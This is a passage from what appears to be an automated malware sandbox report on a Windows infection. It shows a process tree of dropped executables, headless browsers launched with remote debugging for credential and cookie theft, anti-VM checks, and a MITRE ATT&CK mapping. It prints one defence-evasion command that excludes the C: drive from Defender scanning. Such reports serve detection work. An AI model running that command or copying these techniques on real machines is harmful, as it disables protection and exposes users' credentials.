        PID:4444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
        9⤵
        
        PID:5324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2648,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:8
        9⤵
        
        PID:3468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3584,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3600,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5012,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5068,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb8712dcf8,0x7ffb8712dd04,0x7ffb8712dd10
        9⤵
        
        PID:6456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2120,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2116 /prefetch:3
        9⤵
        
        PID:6632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2088,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2080 /prefetch:2
        9⤵
        
        PID:6640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2620,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2616 /prefetch:8
        9⤵
        
        PID:6712
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3080 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:6752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3124 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:6760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4260 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:6824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4656 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:7120
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:6980
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Suspicious use of FindShellTrayWindow
        
        PID:2168
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:5700
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:1152
      - C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4784
      - C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5352
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1396
        8⤵
        Program crash
        
        PID:6292
      - C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"
        6⤵
        
        PID:6424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2q212ibw\2q212ibw.cmdline"
        7⤵
        
        PID:6748
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C5C.tmp" "c:\Users\Admin\AppData\Local\Temp\2q212ibw\CSCDBF501327B9B443E8EC044DBFDC744E.TMP"
        8⤵
        
        PID:7076
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:7152
      - C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"
        6⤵
        
        PID:6744
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:7048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6868
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:7100
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:6292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4536 -ip 4536
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5500 -ip 5500
1⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:736

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:1240
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:392

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:3612
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:2168
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5odnhcyk\5odnhcyk.cmdline"
    3⤵
    PID:3380
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD21.tmp" "c:\Users\Admin\AppData\Local\Temp\5odnhcyk\CSC2E7C4E1890404F3FAB95FDB09E6C1677.TMP"
      4⤵
      PID:2564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1160
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3860

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3596

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5352 -ip 5352
1⤵
PID:6264

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:4300
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:2528

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4260
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  PID:916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1if5qlz\q1if5qlz.cmdline"
    3⤵
    PID:3468
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4452
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75D2.tmp" "c:\Users\Admin\AppData\Local\Temp\q1if5qlz\CSC10C92892E3C84EAEB3BA56AF4813F462.TMP"
      4⤵
      PID:6556
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6596
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion